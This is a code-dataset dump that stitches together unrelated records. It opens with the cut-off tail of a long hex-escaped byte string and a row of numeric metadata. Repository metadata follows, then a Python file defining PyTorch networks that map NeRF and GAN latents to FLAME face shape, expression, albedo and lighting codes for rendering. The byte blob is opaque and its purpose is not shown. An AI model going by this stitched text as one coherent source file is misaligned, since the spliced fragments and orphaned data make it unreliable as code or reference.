x31\x47\x2d\x70\xb8\xc6\xfc\x76\xdc\xb8\xb4\x02\xfb\xf2\xee\xf8\x4d\xe1\x2e\x85\xa5\xbb\x1d\x6e\xe2\x81\x3b\x02\x2a\xf8\x82\x0a\x2c\xad\x2d\x00\xe0\x48\x1b\x2c\x15\xe0\x8c\x68\x17\xa1\x1a\xa6\x78\xd8\x57\xc8\xd3\xfc\xe4\x66\xb1\x38\x5d\x56\x3a\x0b\x77\x6d\x43\xad\x98\x1b\x37\xd5\x58\x44\x2b\xaf\x8f\x16\x20\x07\x54\x19\xb1\xbb\xa5\x50\x2b\x65\x20\x09\x10\xdb\x7a\x9c\x95\xfc\xfb\xf8\x03\x0c\xa2\x49\xd0\x44\x30\xd1\x05\x3f\xab\x55\x93\x81\x37\x64\x73\x01\x34\x4e\x29\x15\x16\xcd\x47\x7b\x14\x13\x1e\x60\x55\x11\x52\xcd\x67\x74\xd7\x38\x30\x54\xba\x10\x4d\x3b\x89\xdd\x1a\x53\x2a\xf0\xf5\x98\x4d\xe5\xa8\xa2\x42\x17\x44\xed\xcd\x0e\xd4\x1e\xca\x34\x5e\xd5\xd3\xe5\x72\xa1\x80\x10\xd7\xae\x87\x63\xc3\xe9\x69\x6e\xcf\x02\x57\xfb\x03\x05\x63\x30\x21\xce\x61\xa9\x0c\x27\xc4\x74\xf8\xf8\xf0\x2d\xb8\x87\x78\x31\x36\xa3\x23\xea\xa6\x14\x3f\x79\xd8\xed\x43\x69\xba\x22\x14\x3c\xf7\x95\x50\x5c\x93\x60\x09\x2e\xd8\xec\xaa\xdc\x4a\x27\xef\xfe\x43\xfb\x82\x99\x07\x82\x2e\x65\xd9\xff\xb7\xb6\xb5\x89\x25\x71\x0a\xcc\x74\xe6\x00\x81\x30\x0f\x56\x72\xc9\x63\x56\xd6\x94\x63\x93\xb0\x61\x3c\xee\xd3\x5a\xd4\x00\x88\x69\x95\xa2\xb7\x2a\x3b\x1d\x22\x7e\x58\x5c\x02\x01\x68\xf7\x64\xc8\xb2\xb9\xce\xa8\x2c\xc7\x9b\x26\x51\x08\xe0\x21\xe5\x59\x05\x42\xe8\x66\xc9\x24\x7b\xa8\xff\x2b\xb1\x89\x14\x81\xbc\x21\x91\x60\xb2\x94\x66\xee\x2d\x4b\x81\x34\x36\xb4\x7f\x36\x4f\x12\xbc\x5a\x23\xd5\x5b\x56\xb6\x2e\x77\x1b\xfc\x20\x1e\x36\x83\xd1\xbe\x83\xc2\x29\x82\x2c\x6b\x01\x5c\x9b\x7b\x4b\x40\xab\x5e\xb0\x8d\x14\xa9\xf9\x06\x6b\x2d\x75\x61\x3d\x11\x5c\xb9\x5f\x88\x3b\x15\xfd\xc5\x02\xb9\x30\x9c\x17\x75\x83\xc0\xa6\xc0\x3b\x5e\xe0\x4e\xc6\xbc\x9a\xca\xb0\x87\x00\x28\xbe\xcc\x25\x2e\x18\x16\x2e\xd7\x35\x1e\xa6\xdb\xbd\xce\xef\x83\x65\xf4\xd4\x08\xea\x17\x29\x6a\x4b\xf9\xfe\xc4\xc9\x51\xf5\x35\xaa\xf1\x9d\x9c\x35\x7a\x50\x48\x27\xf1\xd2\x58\x18\x25\xe4\xad\x20\x46\x4e\x55\x77\x02\x6e\x20\x2f\x96\x56\x61\xc7\xdb\xa5\x98\xdf\xe5\xca\x61\xfd\xc4\xb1\xf4\x1e\x0f\xb5\xa5\x0f\x7c\xbc\x33\x10\x98\xab\xe8\x0f\x22\x57\x3b\
xf0\x3e\xf7\x12\x30\x81\xe5\x82\x3c\xb1\x45\x03\x5d\x0d\xb1\xcd\xf7\x42\x7d\x6b\x41\x62\x15\x2d\x0a\xaf\x5e\x0a\xbc\x99\x65\x8a\xdd\x1b\x1a\xd7\x2c\xe4\xc5\x2c\xf8\x83\x47\xfe\xc4\xe3\xbe\x93\x19\x82\x66\xe4\x15\x4f\xe5\x77\xf3\xa1\x63\xa9\xa9\xb5\x53\xf0\x11\x11\x79\x9a\x3c\x36\x5a\xd3\x06\x16\x35\xb0\x59\x78\xa0\x97\xe4\xc4\xae\x35\x28\xe1\xc7\xdb\x15\xbe\xed\xe7\xe6\x75\xb4\xb6\x63\x9f\x24\xbf\x4f\xc5\xb3\x5a\x2f\x5c\x73\x8b\x94\xb4\x39\xd0\xd6\x10\x84\x1a\x8c\x0e\xdc\x3e\x6e\xc7\x29\xc4\xad\xef\xec\x8e\x31\x14\x8c\x9a\x9b\xe6\xd5\x45\xe3\xda\xf4\x5e\x1c\x4b\x69\x81\xa6\xb1\xca\x5d\x1f\x64\x90\x1e\x2e\xa9\x9f\xa8\xc0\x03\xcd\x0b\x06\xd4\xe9\xee\x61\x56\x93\x6a\xcb\xa2\x25\x46\xf6\x4a\x52\x9e\xe2\xd0\xf2\x97\xa5\x41\x62\xd5\x6c\xc0\x06\xb8\xbd\xbf\x15\x5f\xe4\x38\x31\x22\x74\xd1\xaf\x29\xac\xbd\xb7\x53\x4f\x42\x45\xfd\xf5\x27\xce\xdd\x5d\x8d\x60\x85\x4d\x1f\x99\x24\x1e\x83\x1a\x36\xfd\xa3\x6a\x1a\x87\xf8\x0e\x14\xaf\xe6\xfb\x85\xb1\x7b\xfd\x4c\x6f\x89\xdc\x8c\xd2\x66\x39\xfa\x4e\xd3\xac\x9e\xb3\x50\x8c\x1e\xd7\xf5\x00\x38\xeb\xf3\x9b\xcc\xa5\xf0\x85\x66\x33\x79\x03\x81\xcb\xc7\x39\xae\x70\xd2\x5e\x37\x7f\xc8\xba\x8f\x73\x8f\xf2\x2d\xee\x63\x48\x06\xe8\x3d\x9c\x8a\x19\x1d\x11\xf1\x5f\x62\x13\x05\x06\x5a\x14\x19\x99\x4b\x76\x8a\x11\x95\x2f\xd2\xba\x83\xc2\x6c\x4d\x86\x7d\x09\x57\x2c\x75\xf8\xc4\x16\x5d\x0f\xd5\x6c\x07\xd3\x85\x58\xc5\x29\xbc\x13\xfa\x72\x23\x99\x29\x07\x6b\x8e\x57\x1d\x69\x0a\x72\xa0\x10\x81\x50\xb3\x58\xde\x84\x4b\xf0\xdf\xeb\x08\x68\x4d\x93\x92\xa2\x12\x49\xd7\xec\x67\x30\x5d\xca\x6c\xbe\xba\xc6\x70\x87\x5c\x48\xd1\x65\xab\x0e\x96\x44\x02\x60\xe1\x36\x52\x6a\x4d\xbf\xe0\xe1\x9a\x78\xca\xe7\x12\x2b\xa0\xdd\xbc\xf1\x65\x29\x4e\xbd\x9e\x45\xd1\x32\x40\x32\xd8\x56\xdf\xdf\x99\x73\x5d\xa1\x6d\x0c\x26\x2c\xa2\x27\x5c\x10\x97\x7b\xf9\xea\x69\x6a\x1c\x56\xee\xf3\x28\xdc\x69\x9d\x17\xf3\xed\x7a\x9e\x97\x85\xb4\x9d\xfa\x24\xa4\x82\x3e\xcd\xc8\x6e\x21\x42\x15\xb2\xe5\x4d\x0d\xb9\x1c\x1b\x66\x0d\x99\x7b\x0e\x2e\x9c\xe3\xae\xcb\x06\xb5\xe0\xa0\x47\xbe\x4a\x22\
xea\x90\xd6\x81\x1c\xab\xe4\xf2\x83\xe5\x20\x05\x23\x85\xd2\xf8\x6c\xbc\xd5\x19\x0c\x60\xc9\xc2\x33\xe5\x36\xca\x75\x32\x7c\x85\x4e\xf8\xaf\xa1\x09\x71\x13\x3f\x62\x76\xcc\xb0\x29\xa1\x47\x01\xe4\x05\xb8\x25\x34\xd0\xb1\x80\x34\xdb\xa2\xf6\xff\x0b\x5a\x72\xec\xe7\x9a\xb9\xd7\x11\xbb\x27\x2e\xe9\xe6\xfd\x83\xba\xb8\x16\x26\x74\xe3\x7f\xb8\x3c\x81\x4f\xa9\xa9\x73\x9f\xe4\x06\x2e\x13\xce\xc2\xd0\x99\x45\xf5\xda\x1e\xe5\xe0\xdf\xe8\x70\x2e\xb5\x0e\xfa\xbc\xab\x32\x17\x3e\xe7\xb7\xd6\x64\xa1\x63\x81\x0f\x96\x43\x8b\x54\x86\x94\x61\x4f\x27\x51\x0a\xfe\xf9\x20\x8a\xe7\xe8\x99\x3c\x3d\x84\x6a\x95\x12\xbb\xcd\x1a\xd7\x25\x7a\xb2\x74\x8a\x82\x87\xc8\xa3\x7d\x19\xb4\x05\x46\x54\xe0\xd2\x0f\x47\x55\x10\x2c\xc8\x75\x72\x92\x7f\x68\xd9\x34\xf4\xea\x3f\xa4\xf2\x19\x7b\x10\x9c\x2a\x68\x25\x9c\xc8\x9c\x8d\xf8\xba\xcf\x35\xd1\x5f\x1b\xeb\x50\x82\x89\xf1\x4a\xec\xf4\x60\x0a\x48\x53\x58\x07\x90\x22\x95\x0c\x02\x29\x2a\xab\x78\x2b\x20\xb7\x68\x23\x53\xf6\xc3\x8b\x8d\x7c\x10\xf6\x76\x8a\x5b\x5d\x50\x82\x7c\x92\x21\xb7\x42\x56\xcc\x77\x55\x84\xc1\x27\x59\xdc\xa6\xe1\x9e\x2c\xd3\x12\x0e\xe6\xe2\xc0\x50\x23\x94\x9f\xb3\x4e\x5e\xf7\xe4\xa4\x85\x0d\x69\x1a\xbb\x97\x21\x6d\xf4\x9b\xfc\xc6\xb4\x1e\xd0\xba\x12\x4b\x0d\xec\xfe\x17\xc3\x56\x70\x0b\xee\x4e\x08\x41\x70\xba\x61\xe7\x0e\xe8\x3d\xda\xb0\xdf\xd6\x31\x13\xb4\x41\xf3\xf4\x2b\x62\x2a\x19\x1a\xc7\xbb\xea\xf0\x2a\x0b\xde\xbf\xf4\xe3\x36\x85\xd8\xf5\x86\x80\x07\x13\x07\x37\x2b\x9d\xcb\x72\x50\xef\x42\x5f\xe3\x57\x71\x7e\xd0\xd8\xd4\x4c\x12\x6b\x4c\xac\x09\xf1\x90\x83\x00\x9e\x3e\x1a\xb4\x6c\xe3\x60\x74\x6f\xd3\xc6\xd5\x3c\x7f\xf9\x21\x6a\x03\xd7\x7a\x0b\x9a\x54\xa1\x03\xce\xf5\x21\xa7\x43\x17\x02\x76\x56\x54\x98\xc7\x7f\x7b\x9f\x63\x93\x6b\xdf\x9d\x5f\x49\x23\x3d\x48\x56\x3e\x7e\x4b\x6d\x5e\xa4\xfc\x7e\x64\x98\xb1\x74\x4c\x50\x3d\x91\x30\xbb\xf1\x36\x7a\x30\xf0\x42\x1a\x23\x42\x61\xec\xf6\x33\x16\x1f\xe5\x96\x44\x68\x2a\xb3\xce\x27\x4e\xd5\xaa\x9d\x94\xfc\x8f\x65\x00\x1a\x53\xc8\xb2\x04\x6f\x5c\xd7\x7c\x14\x7f\x45\xdd\xa2\xe5\xa1\x19\xb8\x8b\
xd0\x41\x6b\xef\xad\x09\xc1\x2e\x3b\x6f\x8e\x35\xf5\x84\x9b\xaa\x3f\x06\x44\x19\x65\x8f\x8a\x9a\x74\x5e\x2d\x29\x72\x3f\xf5\x2f\x18\x6b\x2e\xc0\xc8\x60\x68\xe4\x7e\x0a\x1c\x52\x3c\xa9\x07\x94\x45\x51\x4c\x4a\x8e\xc9\x41\x5f\x4e\x2c\xe6\x31\xed\x28\xc5\x03\xcc\xa4\x31\x14\x89\xed\x45\x9c\x80\x08\x75\xdd\x04\x8c\xd1\xd0\x2a\xb4\xe5\xb4\x65\xfd\xc7\x0f\xa0\xce\x26\xcf\x47\x0d\xf5\x0b\x68\xeb\xc2\xde\xd5\x81\x26\x04\x3e\xa9\x9b\x68\x49\x6b\x86\xaf\x35\x35\xcf\x2f\xae\x31\x5c\x5c\xd3\x39\x15\x65\x47\x3b\xf3\x4f\x97\x7a\xaa\x81\x2e\x87\xb0\x3c\x91\x04\x95\xab\x78\x5f\xbe\x87\x43\xf4\x8e\xe6\x4c\x1a\xc8\x9e\xc1\x6b\x70\xb8\x4f\x07\xee\xfc\xdd\x27\xf8\x67\x34\x24\x1d\xf7\x35\xbc\xf4\x77\xd8\x83\xe0\x64\xb9\xff\xf2\x46\x77\x4c\x14\x41\xd7\x48\x2b\xc5\x6c\x3d\x07\x41\xb4\xb5\xb8\xe2\x8d\xfc\xa6\xc7\x50\x53\x94\x4f\x6c\x10\xbc\xb8\x39\x47\xe0\x31\x85\xc1\xeb\xcc\x59\x3c\x48\xdd\x4b\xa2\x8f\xa8\x2a\x1f\x5a\x5d\xfc\x93\x4e\x7f\x97\x76\x35\xad\x28\x55\x61\xfc\x5b\xef\x6a\xbc\xbc\x5b\x6d\x2f\x1e\xd4\x98\x0a\xed\xf2\x34\xc0\x66\x63\xf0\xfd\x38\x27\x02\xc5\x4b\xcc\x02\xa7\x52\x2f\xd6\xff\xa4\xc0\x60\xca\x94\x38\x14\xfb\x65\x56\xc3\xfb\xde\x93\x6a\xd8\xbe\x98\x6d\x15\xfd\x0b\xfd\xf0\xb5\xed\x9f\xa7\x75\x2f\xaf\x5e\xb7\x9b\x2d\xc2\x97\xd6\x59\x78\xed\xd4\xb0\xf2\xc2\x24\x3b\xd9\x10\xd1\xbb\xb3\x5e\xbc\xe3\x75\x10\x25\x82\x97\x5b\xce\x5f\xd4\x29\xc2\xb5\xc4\xdb\xd4\x9f\x40\x08\x38\x5e\x2b\x19\x4d\x50\x25\x7a\xf5\x01\x04\xad\x53\x79\x4e\x48\xf6\xb1\xae\xd1\x49\xf1\x4c\x4e\x10\x9d\x1c\xe6\x4a\x53\xac\x7c\x0e\x17\xfe\xf3\x49\xda\xcf\xe1\xce\x24\xc1\x1b\x2f\x3a\xca\xc6\x03\xe2\x71\x90\x70\x1b\x82\x95\x69\x22\x58\xe0\xd6\xb8\xf8\xe9\x1c\x08\x2d\x8b\x72\x5d\x2e\xf5\xff\xc1\xe7\x34\xce\x8f\xe2\xa5\xc1\x40\x52\xca\x84\x0e\x90\xfd\xcc\xdc\x45\x3e\xc2\x01\x5b\xd2\xf8\x3d\x5f\xf4\x46\x9d\x45\xb6\x1b\xae\x11\xfc\x2c\x13\x09\xc0\x6a\x1a\xaf\x04\xe2\x43\xe5\x5e\x91\x96\xb4\x6b\x35\x9c\x51\xfa\xd7\x8c\x8e\x83\xc0\x5b\x5b\x7d\x15\xff\xef\xa6\x4c\x6d\xf2\x72\x01\x9a\x31\x12\x33\x9e\xb5\xba\xe2\x78\x6f\
x6f\x44\x1c\x89\x51\xf3\xf0\x23\x7e\x35\x69\xd1\x30\x97', 2) | 14,035 | 14,035 | 0.749982 | 3,504 | 14,035 | 3.000571 | 0.074486 | 0.010843 | 0.011128 | 0.009131 | 0.003709 | 0.002283 | 0.002283 | 0 | 0 | 0 | 0 | 0.31364 | 0.000214 | 14,035 | 1 | 14,035 | 14,035 | 0.435647 | 0 | 0 | 0 | 0 | 1 | 0.99715 | 0.99715 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
56bc15a8493c3e2504ffc0189f52c8af7470eb38 | 38,004 | py | Python | rignet/model.py | lelechen63/CIPS-3D | 49e34ecab7410ac357a3d467e347cd39ee442bd5 | [
"MIT"
] | 1 | 2022-03-20T08:10:29.000Z | 2022-03-20T08:10:29.000Z | rignet/model.py | lelechen63/CIPS-3D | 49e34ecab7410ac357a3d467e347cd39ee442bd5 | [
"MIT"
] | 1 | 2022-03-21T04:54:10.000Z | 2022-03-21T04:54:10.000Z | rignet/model.py | lelechen63/CIPS-3D | 49e34ecab7410ac357a3d467e347cd39ee442bd5 | [
"MIT"
] | 1 | 2022-02-25T01:28:10.000Z | 2022-02-25T01:28:10.000Z | import numpy as np
import torch.nn.functional as F
import pytorch_lightning as pl
import torch as th
import torch.nn as nn
import functools
import torchvision
from collections import OrderedDict
import os
from os import path as osp
import pickle
from PIL import Image
import cv2
import sys
sys.path.append('./photometric_optimization/')
from renderer import Renderer
import util
from models.FLAME import FLAME, FLAMETex
sys.path.append('/home/uss00022/lelechen/github/CIPS-3D/utils')
from visualizer import Visualizer
import tensor_util
from blocks import *
import face_alignment
class Latent2Code(nn.Module):
def __init__(self, flame_config, opt ):
super().__init__()
self.opt = opt
# self.save_hyperparameters()
self.flame_config = flame_config
self.image_size = self.flame_config.image_size
# networks
self.nerf_latent_dim = 256
self.gan_latent_dim = 512
self.shape_dim = 100
self.exp_dim = 50
self.albedo_dim = 50
self.lit_dim = 27
self.Latent2ShapeExpCode = self.build_Latent2ShapeExpCodeFea( weight = '' if opt.isTrain else opt.Latent2ShapeExpCode_weight)
self.latent2shape = self.build_latent2shape( weight = '' if opt.isTrain else opt.latent2shape_weight)
self.latent2exp = self.build_latent2exp(weight = '' if opt.isTrain else opt.latent2exp_weight)
self.Latent2AlbedoLitCode = self.build_Latent2AlbedoLitCodeFea(weight = '' if opt.isTrain else opt.Latent2AlbedoLitCode_weight)
self.latent2albedo = self.build_latent2albedo(weight = '' if opt.isTrain else opt.latent2albedo_weight)
self.latent2lit = self.build_latent2lit(weight = '' if opt.isTrain else opt.latent2lit_weight)
if opt.isTrain:
self._initialize_weights()
self.flame = FLAME(self.flame_config).to('cuda')
self.flametex = FLAMETex(self.flame_config).to('cuda')
self._setup_renderer()
self.ckpt_path = os.path.join(opt.checkpoints_dir, opt.name)
os.makedirs(self.ckpt_path, exist_ok = True)
def build_Latent2ShapeExpCodeFea(self, weight = ''):
Latent2ShapeExpCode = th.nn.Sequential(
LinearWN( self.nerf_latent_dim , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for latent2ShapeExpCode feature extraction network')
Latent2ShapeExpCode.load_state_dict(torch.load(weight))
return Latent2ShapeExpCode
def build_latent2shape(self, weight = ''):
latent2shape= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.shape_dim )
)
if len(weight) > 0:
print ('loading weights for latent2Shape network')
latent2shape.load_state_dict(torch.load(weight))
return latent2shape
def build_latent2exp(self, weight = ''):
latent2exp= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.exp_dim )
)
if len(weight) > 0:
print ('loading weights for latent2exp network')
latent2exp.load_state_dict(torch.load(weight))
return latent2exp
def build_Latent2AlbedoLitCodeFea(self, weight = ''):
Latent2AlbedoLitCode = th.nn.Sequential(
LinearWN( self.gan_latent_dim , 512 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 512, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for Latent2AlbedoLitCode feature extraction network')
Latent2AlbedoLitCode.load_state_dict(torch.load(weight))
return Latent2AlbedoLitCode
def build_latent2albedo(self, weight = ''):
latent2albedo= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.albedo_dim )
)
if len(weight) > 0:
print ('loading weights for latent2albedo feature extraction network')
latent2albedo.load_state_dict(torch.load(weight))
return latent2albedo
def build_latent2lit(self, weight = ''):
latent2lit= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.lit_dim )
)
if len(weight) > 0:
print ('loading weights for latent2lit feature extraction network')
latent2lit.load_state_dict(torch.load(weight))
return latent2lit
def _setup_renderer(self):
mesh_file = '/home/uss00022/lelechen/basic/flame_data/data/head_template_mesh.obj'
self.render = Renderer(self.image_size, obj_filename=mesh_file).to('cuda')
def forward(self, shape_latent, appearance_latent, cam, pose, flameshape = None, flameexp= None, flametex= None, flamelit= None ):
shape_fea = self.Latent2ShapeExpCode(shape_latent)
shapecode = self.latent2shape(shape_fea)
expcode = self.latent2exp(shape_fea)
app_fea = self.Latent2AlbedoLitCode(appearance_latent)
albedocode = self.latent2albedo(app_fea)
litcode = self.latent2lit(app_fea)
return_list = {}
if self.opt.supervision == 'render' or flameshape is not None:
vertices, landmarks2d, landmarks3d = self.flame(shape_params=shapecode, expression_params=expcode, pose_params=pose)
trans_vertices = util.batch_orth_proj(vertices, cam)
trans_vertices[..., 1:] = - trans_vertices[..., 1:]
## render
albedos = self.flametex(albedocode, self.image_size) / 255.
ops = self.render(vertices, trans_vertices, albedos, litcode.view(shape_latent.shape[0], 9,3))
predicted_images = ops['images']
return_list['landmarks3d'] = landmarks3d
return_list['predicted_images'] = predicted_images
else:
return_list['expcode'] = expcode
return_list['shapecode'] = shapecode
return_list['litcode'] = litcode
return_list['albedocode'] = albedocode
if flameshape is not None:
flamelit = flamelit.view(-1, 9,3)
recons_vertices, _, recons_landmarks3d = self.flame(shape_params=flameshape, expression_params=flameexp, pose_params=pose)
recons_trans_vertices = util.batch_orth_proj(recons_vertices, cam)
recons_trans_vertices[..., 1:] = - recons_trans_vertices[..., 1:]
## render
recons_albedos = self.flametex(flametex, self.image_size) / 255.
recons_ops = self.render(recons_vertices, recons_trans_vertices, recons_albedos, flamelit)
recons_images = recons_ops['images']
return_list['recons_images'] = recons_images
return return_list
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
class Latent2Code2(nn.Module):
def __init__(self, flame_config, opt ):
super().__init__()
self.opt = opt
# self.save_hyperparameters()
self.flame_config = flame_config
self.image_size = self.flame_config.image_size
# networks
self.nerf_latent_dim = 256
self.gan_latent_dim = 512
self.shape_dim = 100
self.exp_dim = 50
self.albedo_dim = 50
self.lit_dim = 27
self.Latent2fea = self.build_Latent2CodeFea( weight = '' if opt.isTrain else opt.Latent2ShapeExpCode_weight)
self.latent2shape = self.build_latent2shape( weight = '' if opt.isTrain else opt.latent2shape_weight)
self.latent2exp = self.build_latent2exp(weight = '' if opt.isTrain else opt.latent2exp_weight)
self.latent2albedo = self.build_latent2albedo(weight = '' if opt.isTrain else opt.latent2albedo_weight)
self.latent2lit = self.build_latent2lit(weight = '' if opt.isTrain else opt.latent2lit_weight)
if opt.isTrain:
self._initialize_weights()
self.flame = FLAME(self.flame_config).to('cuda')
self.flametex = FLAMETex(self.flame_config).to('cuda')
self._setup_renderer()
self.ckpt_path = os.path.join(opt.checkpoints_dir, opt.name)
os.makedirs(self.ckpt_path, exist_ok = True)
def build_Latent2CodeFea(self, weight = ''):
Latent2ShapeExpCode = th.nn.Sequential(
LinearWN( self.nerf_latent_dim + self.gan_latent_dim , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for latent2ShapeExpCode feature extraction network')
Latent2ShapeExpCode.load_state_dict(torch.load(weight))
return Latent2ShapeExpCode
def build_latent2shape(self, weight = ''):
latent2shape= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.shape_dim )
)
if len(weight) > 0:
print ('loading weights for latent2Shape network')
latent2shape.load_state_dict(torch.load(weight))
return latent2shape
def build_latent2exp(self, weight = ''):
latent2exp= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.exp_dim )
)
if len(weight) > 0:
print ('loading weights for latent2exp network')
latent2exp.load_state_dict(torch.load(weight))
return latent2exp
def build_latent2albedo(self, weight = ''):
latent2albedo= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.albedo_dim )
)
if len(weight) > 0:
print ('loading weights for latent2albedo feature extraction network')
latent2albedo.load_state_dict(torch.load(weight))
return latent2albedo
def build_latent2lit(self, weight = ''):
latent2lit= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.lit_dim )
)
if len(weight) > 0:
print ('loading weights for latent2lit feature extraction network')
latent2lit.load_state_dict(torch.load(weight))
return latent2lit
def _setup_renderer(self):
mesh_file = '/home/uss00022/lelechen/basic/flame_data/data/head_template_mesh.obj'
self.render = Renderer(self.image_size, obj_filename=mesh_file).to('cuda')
def forward(self, shape_latent, appearance_latent, cam, pose, flameshape = None, flameexp= None, flametex= None, flamelit= None ):
fea = self.Latent2fea( torch.cat([shape_latent, appearance_latent], axis = 1))
shapecode = self.latent2shape(fea)
expcode = self.latent2exp(fea)
albedocode = self.latent2albedo(fea)
litcode = self.latent2lit(fea)
return_list = {}
if self.opt.supervision == 'render' or flameshape is not None:
vertices, landmarks2d, landmarks3d = self.flame(shape_params=shapecode, expression_params=expcode, pose_params=pose)
trans_vertices = util.batch_orth_proj(vertices, cam)
trans_vertices[..., 1:] = - trans_vertices[..., 1:]
## render
albedos = self.flametex(albedocode, self.image_size) / 255.
ops = self.render(vertices, trans_vertices, albedos, litcode.view(shape_latent.shape[0], 9,3))
predicted_images = ops['images']
return_list['landmarks3d'] = landmarks3d
return_list['predicted_images'] = predicted_images
else:
return_list['expcode'] = expcode
return_list['shapecode'] = shapecode
return_list['litcode'] = litcode
return_list['albedocode'] = albedocode
if flameshape is not None:
flamelit = flamelit.view(-1, 9,3)
recons_vertices, _, recons_landmarks3d = self.flame(shape_params=flameshape, expression_params=flameexp, pose_params=pose)
recons_trans_vertices = util.batch_orth_proj(recons_vertices, cam)
recons_trans_vertices[..., 1:] = - recons_trans_vertices[..., 1:]
## render
recons_albedos = self.flametex(flametex, self.image_size) / 255.
recons_ops = self.render(recons_vertices, recons_trans_vertices, recons_albedos, flamelit)
recons_images = recons_ops['images']
return_list['recons_images'] = recons_images
return return_list
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
class RigNerft2(nn.Module):
def __init__(self, flame_config, opt ):
super().__init__()
self.opt = opt
self.nerf_latent_dim = 256
self.gan_latent_dim = 512
self.shape_dim = 100
self.exp_dim = 50
self.albedo_dim = 50
self.lit_dim = 27
self.flame_config = flame_config
self.image_size = self.flame_config.image_size
# function F networks
latent2code = Latent2Code(flame_config, opt)
self.Latent2ShapeExpCode, self.latent2shape, \
self.latent2exp, self.Latent2AlbedoLitCode, \
self.latent2albedo, self.latent2lit = self.get_f(latent2code)
# rigNet
# appearance part
self.WGanEncoder = self.build_WGanEncoder(weight = '' if opt.isTrain else opt.WGanEncoder_weight )
self.ShapeEncoder = self.build_ShapeEncoder(weight = '' if opt.isTrain else opt.ShapeEncoder_weight )
self.ExpEncoder = self.build_ExpEncoder(weight = '' if opt.isTrain else opt.ExpEncoder_weight )
self.WGanDecoder = self.build_WGanDecoder(weight = '' if opt.isTrain else opt.WGanDecoder_weight )
# shape part
self.WNerfEncoder = self.build_WNerfEncoder(weight = '' if opt.isTrain else opt.WNerfEncoder_weight )
self.AlbedoEncoder = self.build_AlbedoEncoder(weight = '' if opt.isTrain else opt.AlbedoEncoder_weight )
self.LitEncoder = self.build_LitEncoder(weight = '' if opt.isTrain else opt.LitEncoder_weight )
self.WNerfDecoder = self.build_WNerfDecoder(weight = '' if opt.isTrain else opt.WNerfDecoder_weight )
# Flame
self.flame = FLAME(self.flame_config).to('cuda')
self.flametex = FLAMETex(self.flame_config).to('cuda')
self._setup_renderer()
self.ckpt_path = os.path.join(opt.checkpoints_dir, opt.name)
os.makedirs(self.ckpt_path, exist_ok = True)
def get_f(self,network):
print (network)
print ('loading weights for Latent2ShapeExpCode feature extraction network')
network.Latent2ShapeExpCode.load_state_dict(torch.load(self.opt.Latent2ShapeExpCode_weight))
print ('loading weights for latent2shape feature extraction network')
network.latent2shape.load_state_dict(torch.load(self.opt.latent2shape_weight))
print ('loading weights for latent2exp feature extraction network')
network.latent2exp.load_state_dict(torch.load(self.opt.latent2exp_weight))
print ('loading weights for Latent2AlbedoLitCode feature extraction network')
network.Latent2AlbedoLitCode.load_state_dict(torch.load(self.opt.Latent2AlbedoLitCode_weight))
print ('loading weights for latent2albedo feature extraction network')
network.latent2albedo.load_state_dict(torch.load(self.opt.latent2albedo_weight))
print ('loading weights for latent2lit network')
network.latent2lit.load_state_dict(torch.load(self.opt.latent2lit_weight))
return network.Latent2ShapeExpCode, network.latent2shape, network.latent2exp, \
network.Latent2AlbedoLitCode, network.latent2albedo, network.latent2lit
def latent2params(self, shape_latent, appearance_latent):
shape_fea = self.Latent2ShapeExpCode(shape_latent)
shapecode = self.latent2shape(shape_fea)
expcode = self.latent2exp(shape_fea)
app_fea = self.Latent2AlbedoLitCode(appearance_latent)
albedocode = self.latent2albedo(app_fea)
litcode = self.latent2lit(app_fea).view(shape_latent.shape[0], 9,3)
paramset = [shapecode, expcode, albedocode, litcode]
return paramset
